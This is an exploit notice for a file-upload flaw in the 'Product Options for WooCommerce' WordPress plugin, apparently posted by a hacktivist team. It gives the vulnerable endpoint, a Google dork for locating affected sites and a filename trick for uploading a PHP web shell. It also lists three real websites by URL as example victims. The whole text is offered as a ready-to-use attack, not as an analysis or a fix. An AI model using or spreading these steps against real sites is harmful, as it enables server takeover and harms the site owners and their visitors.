Wordpress Product Options for WooCommerce Plugin File Upload
|[+] Exploit Title: Wordpress Product Options for WooCommerce Plugin File Upload
|[+]
|[+] Exploit Author: M4ni4c
|[+]
|[+] Team Name: Azerbaijan Cyber Army
|[+]
|[+] Official Website: http://az-cyber.org/
|[+]
|[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927
|[+]
|[+] Google Dork: inurl:/woocommerce-product-options/includes/
|[+]
|[+] Date: 11.04.2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell
|[+]
|[+] Your files uploaded to VICTIM/wp-content/uploads/filename
|[+]
|[+] OR
|[+]
|[+] VICTIM/wp-content/[year]/[month]/filename
|[+]
|[+] Examples:
|[+]
|[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] Qarabag Bizimdir, Bizim Olacaq
|[+]
|[+] Thanks: KroNiqs, Niko, Riko, Dado, Sprited
|[+] And Thanks My Friends: F3D4I & AlpArslan Beyy
|[+] Special Thanks: CXSECURITY.COM Team's Members
Post a Comment